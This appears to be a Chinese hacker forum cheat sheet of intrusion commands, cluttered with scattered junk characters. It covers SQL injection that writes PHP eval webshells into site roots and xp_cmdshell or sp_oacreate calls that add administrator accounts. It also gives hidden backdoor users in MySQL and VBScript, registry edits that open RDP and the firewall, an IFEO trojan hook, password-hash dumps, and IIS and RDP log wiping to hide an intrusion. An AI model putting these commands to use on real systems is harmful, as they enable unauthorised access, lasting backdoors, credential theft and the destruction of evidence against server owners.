8 q7 A/ z$ k S1 \4 r1.net user administrator /passwordreq:no
; U# n; y9 X1 C1 r9 p这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了3 o K9 G+ W) X! L7 R3 }5 R" f
2.比较巧妙的建克隆号的步骤
7 g8 q( S' Z6 I先建一个user的用户
) v0 A8 I# ~0 v4 \然后导出注册表。然后在计算机管理里删掉
* M0 T. n/ D* j9 \8 a在导入,在添加为管理员组
7 X0 u: u+ h& h( z0 k$ g" [) C3.查radmin密码
: V0 E: Q2 N, w+ h- ~( freg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
2 }! `6 S4 Q0 p; O: `6 e4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
. f# i8 V/ k+ {0 [7 e% }6 _建立一个"services.exe"的项
( L5 N# }6 L0 J3 Y再在其下面建立(字符串值)2 G; F& b: l8 b' c5 p- T+ {7 g2 ~4 [
键值为mu ma的全路径8 g s# o% ~" Z! U+ v
5.runas /user:guest cmd
5 d9 J+ i+ r, E$ n0 A5 R: P2 R测试用户权限!
( w- Q& y2 A$ ^# r, X6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?* k5 @; P I. `% Y; q
7.入侵后漏洞修补、痕迹清理,后门置放:- V) y, ]7 v: i; ?0 r1 W
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门9 b& J _2 {) W' t5 ?9 T
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
/ ?; S. W# L7 x8 U6 v/ t, U0 E4 `- d( s2 y" f5 U4 P5 f1 l' X
for example
[+ A6 g$ ?" D7 t j2 L
8 [2 B! I9 I7 Udeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'7 O* P7 Y/ ^% l' v1 r* R0 Q
2 I3 q; R( c3 B- ^) F2 u; D5 N
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
& f# @% X' w% ?; e; ~3 s; k. Y. s; [( ?( p+ F0 |& r8 C
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了7 d4 p0 O/ L3 [. A% R; T
如果要启用的话就必须把他加到高级用户模式
9 C8 T0 V2 } X: s4 v# n g- J可以直接在注入点那里直接注入
# i8 y# \" d# P6 {/ F/ Mid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--( h+ |1 G0 [, ~( j& B3 I
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--* L2 e" Y( U. _% t. ~
或者1 O% W2 n; }2 H& O2 \3 ]3 F) o
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'$ |% J. y/ _- m5 X/ P
来恢复cmdshell。0 q$ j) A8 m, M4 \8 J; \3 `
* J8 j3 Z& K+ }2 n, p分析器7 Q/ g2 V7 C. @& C; S% Q) H& g
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
( f) [/ y, w5 U然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll"); a7 A, u5 Q2 V2 P8 _9 n& P
10.xp_cmdshell新的恢复办法; A: e, q+ G# _6 u5 k
xp_cmdshell新的恢复办法5 W( U2 c; ~9 A* `- t6 a2 b& ~
扩展储存过程被删除以后可以有很简单的办法恢复:" o- R; @4 r0 B P1 ]. e6 N9 z
删除) |, E4 h. k4 o0 H/ r- K
drop procedure sp_addextendedproc
* A$ M5 c. R* `$ j" D$ c; Adrop procedure sp_oacreate0 D( i* N1 ]6 N: C% d. c' l
exec sp_dropextendedproc 'xp_cmdshell': ?7 C; G. r+ g" r' d+ ^% e# i
, I4 z* @7 h+ i2 ]* v1 L恢复
; _0 C0 Q& g! {6 N% G M8 j) [9 C# Zdbcc addextendedproc ("sp_oacreate","odsole70.dll")
) ?/ Q# I: D- o+ W: }dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
5 t/ ?( X0 U5 ~6 S! S$ |. O
7 E) B! S* j. j% d" y& G这样可以直接恢复,不用去管sp_addextendedproc是不是存在; s1 v, @ c% ?+ F; u
/ Z& U& X0 K: y1 ]* {+ E7 M-----------------------------2 L- P" n/ F, }! \
5 F1 o1 \3 H2 O
删除扩展存储过过程xp_cmdshell的语句:
3 \' Y/ L+ ~5 Z; I* z8 uexec sp_dropextendedproc 'xp_cmdshell'
2 w/ e0 `4 v8 u' @0 H4 ?0 z
; ?" z! G# d. |1 A* L& G恢复cmdshell的sql语句" F* Z- f+ [2 d( p
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'" r; s; x; o! h d
% b. ^! s5 R B2 o' O; S4 }
# P; f9 R+ p2 Q% ?. x* F# J% I
开启cmdshell的sql语句
: J9 C" H4 j8 }, f3 a- a
& Z# c( Y2 I; T* E, S( g, _exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
2 T+ D0 z' j2 `
2 n' C0 W- a# H! r! ?1 Y判断存储扩展是否存在
0 U ]# M8 W# ?4 x5 dselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
/ D: O( \1 s. \9 ^返回结果为1就ok5 m4 `( p3 k, T& h
" P# J" _7 ~( |1 p
恢复xp_cmdshell
: M2 F# r9 @& g- Y% V( }exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'( s7 V: L0 Z- [! `+ T& ?
返回结果为1就ok
4 K0 E, }6 J t: s3 y$ }" e: G) n7 _/ a) ]$ ^
否则上传xplog7.0.dll
" ]+ L% J& _+ H+ y( f# ?exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
# v" R" p/ }) E6 {7 Z/ o2 k0 i( o8 ~" F) d
堵上cmdshell的sql语句% ?( e5 P# p3 s E, D. G( y
sp_dropextendedproc "xp_cmdshel+ U( o }6 P. ]5 N& e
-------------------------0 y L6 z) }/ B# A% c: O
清除3389的登录记录用一条系统自带的命令:( m3 b1 b2 a& A8 C$ U$ X" @
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f. c, ?- ^ q( \% g% q) a
$ V1 p, q3 {3 H5 ?- X A) @1 w4 g* r% R然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件6 T- g0 P5 q/ t( w! z' n z( m3 e
在 mysql里查看当前用户的权限
2 S. \) S6 `% G: M7 t4 U* eshow grants for * _1 o. k% D7 q, K; _) [& a
! I0 o* Q, P: g( [以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。8 q" u. v @ a$ y- l6 z/ f9 y/ S( Q
$ P1 q) w' N) B# p: v8 v4 w1 u: @3 v2 q) U! W' U7 p' g
Create USER 'itpro'@'%' IDENTIFIED BY '123';: ^ W7 o( ~0 V7 J+ ]4 ~: W
, F. I3 `: o8 e% z" I1 W- j8 n5 oGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
4 {5 l z; N; ?) i9 j. A" k" I* E4 O* ^. F
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
! j! L+ l6 A- |' B. b! J
, \, G- M+ `% G: o6 a, I5 sMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;. H6 A( @1 ~4 R: F" B) Q, Q0 V2 {
7 Q+ m/ T! A0 A4 o, H6 S
搞完事记得删除脚印哟。
9 J2 Q( }+ O7 H3 H, l( e& F* f$ P8 Z- t/ ^
Drop USER 'itpro'@'%';
( T7 h( u/ {! s4 |$ g% b7 y" }# J; H, }8 w
Drop DATABASE IF EXISTS `itpro` ;
2 b$ d( G4 L- ?2 D! v9 G! ^$ ^/ V5 g& q
当前用户获取system权限
9 }) L. r' T# a6 [sc Create SuperCMD binPath= "cmd /K start" type= own type= interact7 a: \+ H: G, f" z9 P
sc start SuperCMD
9 [7 G! v% R) F& A. y% k G程序代码
( a; W) F' F9 Z% X \ x1 Y' j1 v<SCRIPT LANGUAGE="VBScript">3 d" `! T8 `( E* V% }5 M1 Z
set wsnetwork=CreateObject("WSCRIPT.NETWORK")( p; i1 y. ^" x' ?0 y
os="WinNT://"&wsnetwork.ComputerName
7 ?" u$ l# D+ F1 W uSet ob=GetObject(os)
( s3 p( i# d" ?" H; pSet oe=GetObject(os&"/Administrators,group")4 V( u9 g: ]0 W2 S+ H2 |7 `
Set od=ob.Create("user","nosec")8 F$ `6 ^9 k2 T- e
od.SetPassword "123456abc!@#"; D9 o+ V n6 b1 t# J' ~( D& Z
od.SetInfo
* W! A8 F; I& H. C: }( }5 m) ESet of=GetObject(os&"/nosec",user)
% u# v6 t/ H u3 G4 g/ ?oe.add os&"/nosec"
1 }+ M, S. G. o9 f# ]" M( ~, [/ P- f</Script>" G: r: K% n. Z+ X2 B
<script language=javascript>window.close();</script>8 i+ B& Q+ }; Z
- \ G$ u! x* r w2 g3 u0 X' s
; B( s f: k; |3 h1 Q* V- I
9 U) q& k& o, Z7 }( P2 \' _
3 x5 f. g3 y( N( r0 Q% `8 \) n) i突破验证码限制入后台拿shell
& |2 \, n* P* m2 @& @程序代码 H% g0 n& Q) p( O0 x. M7 w& j3 x
REGEDIT4
, Y7 {6 D: M$ {0 d3 q! L[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] 1 u, J( B0 e; B1 ]( I5 E
"BlockXBM"=dword:00000000
/ G9 G) O1 y7 t& \: v$ H
8 }0 i9 x& H: ^1 N. _0 n" K保存为code.reg,导入注册表,重器IE
: j* ^' t# z/ O, X* }就可以了
: t4 T( ?' W4 l; _. @% Iunion写马: L" I( N T6 K4 f7 k3 _$ ?
程序代码; ] O0 a n. K7 h# f9 O' h
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*5 x) H7 w! w! V
% `2 R+ A/ q8 [8 s e8 n! w
应用在dedecms注射漏洞上,无后台写马
+ t) y$ G: B3 Sdedecms后台,无文件管理器,没有outfile权限的时候, j. h( T% M! S1 a, P: K7 Q/ _+ s0 r
在插件管理-病毒扫描里
( [, |0 J% } ?' K! |写一句话进include/config_hand.php里* `% o. {& S: M
程序代码
& b3 V& j6 |; W2 t4 r: q; }>';?><?php @eval($_POST[cmd]);?>
" B L& a' A& h
" A+ d2 K$ Z8 C* J& X! D9 |# ?. E' P0 i- V& R
如上格式0 {' s9 F. C/ \( | g, t
& U$ s, B9 |3 Y g" `: A6 e' F$ d9 k
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
9 Z7 J2 N9 v4 P8 H5 q9 ~2 a" J程序代码
( p' T5 G1 L$ x# I4 i9 u {- Y+ Hselect username,password from dba_users;) B6 e- j9 q& C4 u2 `& B: Z
7 a: |, J* _2 p5 V) J4 ~4 P; J3 H. ^1 S- Y: J# g6 a% [1 F* Z: k# N
mysql远程连接用户; r* G. a* z, c+ }' ^1 E
程序代码* F, c- o+ C+ `
6 N% U% v: b, |( {6 a4 bCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
: \0 h8 t, n: x ]5 O: n! Z' d( y8 DGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
7 S% `. X$ q" A0 Q7 X) ~9 g bMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
! r7 A4 }; A1 }+ qMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;) [3 x, l- \! t5 j+ b* \. [
5 r1 i: d( `% Z" _. y: l+ Y4 y
, u3 _9 |' ?* q, u& k# S4 H7 R: l
' E ^! }: l4 r) M4 \; J8 E& f# ?! ]; \! T
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0- h8 h& i; @1 }1 r; V
2 H3 u0 u" F1 y1.查询终端端口. e% g. A8 d( y2 v; h
+ t) S% F: v5 B) fxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
0 v3 H: I& F) f L
! r6 e, U1 L" ]; A) _通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
6 x2 m6 j" b0 ftype tsp.reg& e1 f* ~0 d" M/ ^
# Q% x4 W) L1 `5 X2 E1 ~% Q! r2.开启XP&2003终端服务
: H, B3 `9 K' k" t
1 b3 m; S3 [4 [0 j# q! T1 I" N! i/ ^. s
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
' T- @) h, k) b9 |( g: y: a! Y$ l4 c" W$ o
h3 [* M0 y6 X% g+ Q% I& M* f2 OREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
A) [2 X' S; Y: O4 G+ _* t7 K8 H7 x8 K# D W6 k5 a2 g6 N
3.更改终端端口为20008(0x4E28)
8 v1 d2 g3 D: ^; |1 e" P6 b9 A! Y( j3 k& v+ k. @' @3 K
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f0 [/ s3 D0 W( T9 Z+ z
2 M! G, n1 u2 x4 lREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
( V, L5 Q* t, k- q/ C0 P/ q6 E/ F8 F1 u2 k: q! ~
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制. P' p" O) ]4 Q6 q
2 o. r6 `* ^( F ZREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
9 _+ L1 B1 g! @ ^2 J1 F1 E& X/ K( A ]2 T+ u# ]7 v( y- V* `
! j, Z: X, \* e, |2 z4 U4 `
5.开启Win2000的终端,端口为3389(需重启)
4 K" ~: }8 r* ^, h) d/ [: _2 k
% ?, p3 l$ j& }- E1 w4 oecho Windows Registry Editor Version 5.00 >2000.reg / Z( P/ w. e1 z/ H
echo. >>2000.reg7 Z6 B0 _( @& ^3 W( g% k& d% g) U
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
; u# ^' z s1 |echo "Enabled"="0" >>2000.reg
8 Q# E' s5 [6 lecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg ) |7 f- @3 O6 C' Z
echo "ShutdownWithoutLogon"="0" >>2000.reg / R5 x0 G% n# P
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg * ?8 O$ g7 H- Z+ ^8 U5 f
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
8 v6 q8 o( e! g+ ~" E9 |echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
+ B$ P5 A. P* Zecho "TSEnabled"=dword:00000001 >>2000.reg
& k, n8 e5 @) A5 W% |% Aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg $ k% ]' X. w$ B
echo "Start"=dword:00000002 >>2000.reg
: O6 S( q1 q5 H9 a' k2 T. `) ]echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
) m1 A1 {: K1 g( b' ?/ o( b" Fecho "Start"=dword:00000002 >>2000.reg
- r# H9 p0 O$ T- g+ [: ?& Necho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg 7 c# D/ |7 o! e, s- M( k+ v
echo "Hotkey"="1" >>2000.reg
; u6 }# R/ v+ g/ m! Z% _$ Y, n: Y& P& mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg Z0 W9 z! X# Z4 ~- t
echo "ortNumber"=dword:00000D3D >>2000.reg
, [# {) E3 b$ c+ v6 B3 I3 a9 Uecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
6 l6 `! t; ~; @0 xecho "ortNumber"=dword:00000D3D >>2000.reg" l" K* u3 h8 l( v" ^' M' m
) x. D( ~. j3 R, Z& s6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
7 L. @/ u+ | X! F
* H+ Z# U3 w' I+ J' {1 U- ]@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
6 R4 i; {" j: ?& L6 n(set inf=InstallHinfSection DefaultInstall)
9 P" G1 k( U! y. i0 Jecho signature=$chicago$ >> restart.inf' P& K d, d5 a9 O
echo [defaultinstall] >> restart.inf$ l& B% f+ m6 F" k0 N! ^% q
rundll32 setupapi,%inf% 1 %temp%\restart.inf
' m) j. d4 h0 O" {+ |. e1 l8 @$ }
) K8 y: |) P1 J, v7 M" V& [7.禁用TCP/IP端口筛选 (需重启)
/ d( } P& ~! _4 r
, A8 ]$ V8 D$ ^9 B, VREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f7 z: s% j" X y0 G. p P3 y# G
: R6 A, s3 ~& F( E. G" t9 A: u
8.终端超出最大连接数时可用下面的命令来连接
5 `% f* e g: @. y8 f' r
# z* M' ]) {, d; J* x Jmstsc /v:ip:3389 /console) x) _& O" V1 b
% z9 m. M% r/ k7 o* ?9.调整NTFS分区权限$ H& I! n! x' M6 Z% t0 H
1 _7 u" e$ X9 P; Y+ [" j4 V+ N
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
- E0 a1 }; o8 i# g
/ v' K2 y0 T$ r/ F" {, vcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)3 f" s8 U0 E7 r: F4 f! B
% i7 n4 Z. h8 f" M5 g
------------------------------------------------------
% R3 g# B0 A. q3389.vbs
/ T1 y& \% H/ \+ P4 _" G) QOn Error Resume Next
1 d7 E! A1 e, ~7 }const HKEY_LOCAL_MACHINE = &H80000002
* Z) a- d' ^$ M$ h, rstrComputer = "."
& _( ^& z6 ~+ O# qSet StdOut = WScript.StdOut
- e6 ^- q( K/ n. K+ mSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
" k A" p5 i! istrComputer & "\root\default:StdRegProv")& ~+ B; @+ a* e! m @, d' {
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"$ C. W5 A& @# P5 {
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
& w8 `) q/ P4 z, H! L! ~* lstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
g0 Q: d* Q' Q8 X' ooreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath5 E! `( U; q- A- M3 |9 y! L
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp". P0 m% e: `$ d1 B/ z+ r. X
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"1 M5 ], l. T$ o# Z9 J
strValueName = "fDenyTSConnections"
* ~8 Q# u0 o) R9 N" G! l! I7 BdwValue = 0
7 A+ p- n4 T( a e0 M" B2 R$ X, D# Ooreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
" _6 ]" }% N9 i4 T2 \strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"0 Z8 s- Y; N8 ~5 k: p% ]# v. @0 S
strValueName = "ortNumber"
2 T) v9 G7 P7 RdwValue = 3389) z P4 { |+ B0 a+ K/ S2 A7 ~2 f
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
# a, ?- M; [4 d7 h: J/ CstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"( x. P5 q, `2 Y T! y# c( Q6 a
strValueName = "ortNumber"
* I: s, F8 I- G, O; ~dwValue = 3389
2 W/ O- s G' U8 g1 L% S3 X6 \oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue* Z# @; e7 T* i/ Z1 O) Q
Set R = CreateObject("WScript.Shell")
9 X8 |# @0 G0 A1 l* PR.run("Shutdown.exe -f -r -t 0")
) b$ s$ c' u0 G9 M3 k7 l
# t! U! D1 m3 f n, @) w' Q, x删除awgina.dll的注册表键值
/ V! q& B/ u/ c程序代码! V( H% ^2 m2 ?! J, q# k9 I
9 W! s5 v3 @' [6 K1 hreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
# [: l# {7 e" w: ]% `0 ^* w
L' N$ }; y/ S+ C1 v6 a
2 X6 x/ |- n& K2 t6 d" _. U7 ^0 e% f
. v% z9 `/ P q
% z) H* `" g$ m3 R5 `程序代码
4 n0 x3 U/ N8 X9 k7 d& q. THKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash g2 N g, C! o& i* T
, d# d; u9 f2 y% \% t' H设置为1,关闭LM Hash
- Y2 T/ L- N/ C0 @( g7 d3 R( g2 _' H9 @0 f4 ]. z/ \
数据库安全:入侵Oracle数据库常用操作命令
6 G5 k! Q3 e! E* p- }2 p" v最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
1 K( s0 y; W6 t' l) @; g8 m# ^1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。# S% k- [9 i2 ^) V
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;. [8 H3 ^2 D- X# I5 Y) K+ [
3、SQL>connect / as sysdba ;(as sysoper)或 ?" i! Z& {6 z2 C- ^
connect internal/oracle AS SYSDBA ;(scott/tiger)
4 r% s9 A% C8 T+ g6 [* i* uconn sys/change_on_install as sysdba;/ o5 o1 l! @1 R. { ^' |/ i
4、SQL>startup; 启动数据库实例
2 \# z8 G+ d3 S5、查看当前的所有数据库: select * from v$database;
- R [' F7 j4 ^3 m7 Q5 ~. |; l0 Q; lselect name from v$database;6 Y+ E% F6 `6 A- F
6、desc v$databases; 查看数据库结构字段4 c6 j9 n) H$ _$ V$ i4 V
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:& {( u1 D& n8 h
SQL>select * from V_$PWFILE_USERS;
. z. D& w/ `# S3 l8 @. ^! IShow user;查看当前数据库连接用户
9 F/ A) N o1 Y7 W* J3 R8、进入test数据库:database test;* d3 B" ]6 Q5 z: ]$ V
9、查看所有的数据库实例:select * from v$instance;2 @. b- B7 n D( B% Q
如:ora9i
7 L* M2 a; p- m* k: }& H10、查看当前库的所有数据表:
6 F4 x# q6 ~. i% s5 Z& d: TSQL> select TABLE_NAME from all_tables;( t/ d4 w, b: B0 r J
select * from all_tables;) S* z$ d. Z" X1 Z- O R
SQL> select table_name from all_tables where table_name like '%u%';
) |( s+ K8 v0 Z [9 y; |7 xTABLE_NAME% s6 f& E0 ^& x9 s- J: l
------------------------------
" {! L6 L2 l6 M* s% j_default_auditing_options_
2 j6 x( O' H* {11、查看表结构:desc all_tables;$ A z d9 `3 j
12、显示CQI.T_BBS_XUSER的所有字段结构:
& F8 w# x- a" {9 y( H; wdesc CQI.T_BBS_XUSER;
* R- C) @; G: F) O) Y' s6 [13、获得CQI.T_BBS_XUSER表中的记录:! r l0 {+ |2 q. b+ p
select * from CQI.T_BBS_XUSER;
8 O( G, v4 U% _& V% x14、增加数据库用户:(test11/test)
0 ^' j- ?. {( ]$ o% `7 e# M$ Mcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;; J: s' g9 t8 d& S
15、用户授权:# E3 R- k' q+ M5 ]9 [
grant connect,resource,dba to test11;/ M8 C' m& c; J1 [8 l5 L9 j8 J: R
grant sysdba to test11;
0 O: b( D: |+ Wcommit;
- y1 }: ]9 Z# X! g6 l* H4 p, s$ t4 {16、更改数据库用户的密码:(将sys与system的密码改为test.)( F, K# d5 t. Z, A N8 k
alter user sys indentified by test;
1 K) b: P5 O+ `0 \+ u* Lalter user system indentified by test;4 c x8 N7 a( x0 n+ `) c# O! ?, S( C
# |9 Q- I ]) B, P5 ^$ Z. c n
applicationContext-util.xml
' d9 x( y6 U$ aapplicationContext.xml
, c$ h8 R5 ~$ r8 J& jstruts-config.xml
& u5 k# Q& \' W% K3 Tweb.xml7 W2 c# Z& v+ N
server.xml; ^1 \7 s9 }4 x
tomcat-users.xml+ @3 O. m7 z- R9 m, C8 ~- C
hibernate.cfg.xml. F/ l7 q# ?" h( n5 S# B
database_pool_config.xml
$ s, `1 N, }! {2 z
6 N# \8 P5 ^. ^' Q8 g6 q5 _6 e( P! p2 o. r8 v& K
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
% O I: ]5 `3 g\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
& f0 J& M9 I) K, E/ |- ]\WEB-INF\struts-config.xml 文件目录结构
0 k/ p& ?# n) K' H! e2 o
: z1 q2 o; \8 e/ {, v6 Q* n* rspring.properties 里边包含hibernate.cfg.xml的名称
1 `( I8 @% Z0 {+ o4 i8 v0 z; [ _5 c3 Z) B( i- c5 P
# q" j; e) j, v/ }, G3 j9 ^: c; T
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
! y3 J) w4 k) G
; Z& x( L% s {( E* l' R. j如果都找不到 那就看看class文件吧。。
$ A' C% d' Z$ B7 \* U# p, B3 h( I/ A' S ]% C$ Q
测试1:
6 v9 Q+ h& d" l4 i; O) k1 xSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t17 p6 i% i& [5 B F( W6 ]/ H8 w
+ Q- {* T5 j% O; ]2 K1 i$ _
测试2:
- K% Y' s y7 O4 w! O- A2 c% ?& Q7 l* T7 Q) w$ w3 z, f
create table dirs(paths varchar(100),paths1 varchar(100), id int)
0 ]2 A% @4 s) C' r& t8 b8 ?7 I+ ^* W: \1 y* [. ?
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
* C0 t! N) p: o
0 _3 H! J" R) rSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t17 [+ T. M7 P# n, c" X( d, j7 S
6 X* ^; M) W R# W
查看虚拟机中的共享文件: H$ c) D3 ^$ C# Q& e+ O, I
在虚拟机中的cmd中执行
) x5 m0 P2 y* h+ `/ V& s" f; _& R\\.host\Shared Folders6 I" Z9 Q7 |0 u6 W7 P
4 E8 B+ P/ r: o9 {cmdshell下找终端的技巧5 j0 \( d- O- t2 e* _2 `
找终端:
/ H" p- X5 q" p/ Q2 k第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
! w8 t) q% l6 T6 U4 Y; v& } 而终端所对应的服务名为:TermService
) M' o! P j5 V6 j& g4 ^: c第二步:用netstat -ano命令,列出所有端口对应的PID值! 3 W& s# R5 h8 i2 B+ D
找到PID值所对应的端口
0 \( O0 p4 b/ ^: N4 i! w' ]2 X9 l& O0 P* ^' L- f
查询sql server 2005中的密码hash
/ ?! i- Z. g7 kSELECT password_hash FROM sys.sql_logins where name='sa'
